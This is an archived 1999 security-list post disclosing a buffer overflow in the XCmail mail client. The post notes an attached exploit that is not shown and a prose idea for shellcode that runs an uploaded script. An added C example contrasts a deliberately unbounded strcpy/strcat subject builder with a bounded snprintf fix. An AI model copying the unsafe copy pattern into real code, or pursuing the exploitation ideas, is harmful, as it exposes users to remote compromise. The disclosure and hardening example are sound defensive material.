[0z0n3] XCmail remotely exploitable vulnerability

From: Arthur (pierricat_private)
Date: Mon Mar 01 1999 - 15:41:21 PST


I have found a vulnerability in XCmail that is exploitable,
a simple buffer overflow vulnerability.

The bug appears when replying to a message with a long subject line, and
only when autoquote is on (dunno why... I didn't have time to read the
sources, and I'm so lazy)....

The exploit is trivial, but as the buffer is not very large you have to do
very precise return address calculation, and I believe it IS remotely
exploitable, but you have to know a lot about the machine you want to gain
access to... so this definitely won't be useful to script kiddies
(rootshell.com folks: don't waste your time ;)

Maybe one could upload a script by FTP, and modify the shellcode so that
it copies the file to /tmp, chmod()s it and executes it...

Sample exploit attached.

THE AUTHORS HAVE BEEN NOTIFIED, and they responded quickly.

--
[ WWW  page ]  http://www.multimania.com/xsfx/
[ PGP  key  ]  http://www.multimania.com/xsfx/files/XSFX.key
[ IRC       ]  EFnet / IRCnet
[ ICQ #     ]  26995402
    
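Added example, not code from the post or from XCmail's source (the advisory gives neither the buffer size nor the copying routine): the unbounded-copy pattern behind this class of bug, shown beside a bounded replacement that rejects an oversized subject instead of auto-quoting it. REPLY_SUBJECT_MAX, the function names and the 299-byte sample subject are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the reply subject: the advisory only says the
 * buffer "is not very large", so this is a constructed value. */
#define REPLY_SUBJECT_MAX 64

/*
 * Unsafe pattern (hypothetical illustration, not XCmail's source): a fixed
 * buffer and an unbounded copy. Once strlen(subject) + 4 exceeds the buffer
 * the copy runs past it and overwrites the stack frame, which is the bug
 * class the advisory reports. Shown for contrast only; never called here.
 */
void build_reply_subject_unsafe(const char *subject, char out[REPLY_SUBJECT_MAX])
{
    strcpy(out, "Re: ");
    strcat(out, subject);               /* no bound on the subject length */
}

/*
 * Hardened form: snprintf() is limited by outsz and always NUL-terminates.
 * Its return value is the length the full string would have had, so a value
 * >= outsz means the subject was truncated; the caller can then refuse to
 * auto-quote and log the oversized header instead of silently continuing.
 * Returns 0 when the subject fits, -1 when it does not.
 */
int build_reply_subject_safe(const char *subject, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "Re: %s", subject);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                      /* truncated: treat as a bad header */
    return 0;
}

/* Returns 1 if the subject fits a REPLY_SUBJECT_MAX buffer, else 0. */
int reply_subject_fits(const char *subject)
{
    char buf[REPLY_SUBJECT_MAX];
    return build_reply_subject_safe(subject, buf, sizeof buf) == 0;
}

int main(void)
{
    char buf[REPLY_SUBJECT_MAX];
    char long_subject[300];             /* constructed 299-byte subject line */
    memset(long_subject, 'A', sizeof long_subject - 1);
    long_subject[sizeof long_subject - 1] = '\0';
    if (build_reply_subject_safe(long_subject, buf, sizeof buf) < 0)
        printf("rejected oversized subject (%zu bytes)\n", strlen(long_subject));
    return 0;
}
```

The check matters at the boundary: with a 64-byte buffer and the 4-byte "Re: " prefix, a 59-character subject fits and a 60-character one is rejected rather than written past the end.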
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:37:58 PDT